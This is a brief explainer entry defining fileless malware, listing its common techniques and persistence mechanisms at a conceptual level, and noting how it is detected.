ELI5: What is Fileless Malware?
Most bad software leaves files behind, like muddy footprints. Fileless malware lives only in the computer’s short-term memory and uses the computer’s own tools to do harm, leaving almost no trace.
Definition
Fileless malware is a type of malicious code that operates entirely within a system’s memory (RAM) rather than writing executable files to disk. It typically leverages legitimate built-in system tools—PowerShell, WMI (Windows Management Instrumentation), the Windows Registry, or scheduled tasks—to execute malicious payloads. Because no files are written to disk, traditional signature-based antivirus solutions that scan files cannot detect it.
Key Details
- Lives in memory—evades file-based antivirus and forensic analysis after a reboot (unless it establishes persistence elsewhere).
- Common techniques: PowerShell command execution, WMI subscriptions, reflective DLL injection, living off the land (LOLBins).
- LOLBins (Living Off the Land Binaries): Uses legitimate Windows tools (certutil.exe, mshta.exe, regsvr32.exe) for malicious purposes.
- Persistence mechanisms: Registry Run keys, WMI subscriptions, scheduled tasks—these do touch disk but the payload remains in memory.
- Detection requires behavioral analysis (EDR), script block logging for PowerShell, and memory forensics.
Connections
- Parent: malware-types — an advanced evasion-focused malware category
- See also: polymorphic-malware